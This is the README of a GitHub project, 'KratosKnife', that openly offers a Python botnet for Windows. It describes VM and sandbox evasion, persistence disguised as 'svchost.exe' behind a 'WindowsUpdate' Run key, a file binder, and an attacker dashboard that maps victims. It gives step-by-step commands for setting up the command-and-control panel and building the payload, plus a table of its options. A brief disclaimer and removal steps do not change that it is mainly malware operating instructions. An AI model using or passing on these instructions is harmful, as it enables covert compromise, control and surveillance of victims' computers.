KratosKnife is a Advanced BOTNET Written in python 3 for Windows OS. Comes With Lot of Advanced Features such as Persistence & VM Detection Methods, Built-in Binder, etc
PythonBSD-3-Clause
KratosKnife
KratosKnife is a Advanced BOTNET Written in python 3 for Windows OS. Comes With Lot of Advanced Features such as Persistence & VM Detection Methods, Built-in Binder, etc
Disclaimer
💻 This project was created only for good purposes and personal use.
THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.
3 Powerfull Methods to Detect/Bypass VM (such as VirtualBox, VMware, Sandboxie)
Built-in File Binder
Useful Icons Inside icon Folder
Virtual Machine Bypass Methods Includes
Registry Check
Processes and Files Check
MAC Adderess Check
Screenshots
Login Page
Dashboard (Attacker Control Panel)
Show Victim Location On Map [NOTE: Location is IP Based, Not GPS]
Prerequisite
Python 3.X
Few External Modules
Server Setup
Upload & Unzip panel.zip on your hosting available in this repo
Create a database with any name you want
Change the data in classes/Database.php
Change files and folders permission to 777 [Uploads Folder, Scripts Folder]
Go to install.php to create the botnet tables automatically
[For Testing Locally]
Install XAMPP, & Put panel files inside htdocs folder and Run Apache & MySQL Service In XAMPP Controller
Create a database with any name you want
Change the data in classes/Database.php
Go to install.php to create the botnet tables automatically
Usage
# Install dependencies
$ Install latest python 3.x
# Clone this repository
$ git clone https://github.com/PushpenderIndia/KratosKnife.git
# Go into the repository
$ cd KratosKnife/Botnet-Generator
# Installing dependencies
$ python -m pip install -r requirements.txt
# Update pyinstaller.exe path, in Generator.py (line 9) # Getting Help Menu
$ python Generator.py --help
# Making Payload/BOTNET
$ python Generator.py -s localhost/panel -o output_file_name --icon icon/exe.ico
Available Arguments
Optional Arguments
Short Hand
Full Hand
Description
-h
--help
show this help message and exit
--interactive
Takes Input by asking Questions
--icon ICON
Specify Icon Path, Icon of Evil File [Note : Must Be .ico]
-i INTERVAL
--interval INTERVAL
Time between reports in seconds. default=12. [Under Development]
-t TIME_PERSISTENT
--persistence TIME_PERSISTENT
Becoming Persistence After __ seconds. default=10
-b file.txt
--bind LEGITIMATE_FILE_PATH.pdf
Built-In Binder : Specify Path of Legitimate file. [Under Development]
Required Arguments
Short Hand
Full Hand
Description
-s SERVER
--server SERVER
Command & Control Server for Botnet.
-o OUT
--output OUTPUT
Output file name.
Removing BOTNET
Method 1:
Go to start, type regedit and run the first program, this will open the registry editor.
Navigate to the following path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run There should be an entry called "WindowsUpdate", right click this entry and select Delete.
Go to your user path > AppData > Roaming, you’ll see a file named “svchost.exe”, this is the RAT, right click > Delete.
Restart the System.
Method 2:
Run "RemoveBOTNET.bat" in Infected System.
Restart Infected PC to stop the current Running Evil File.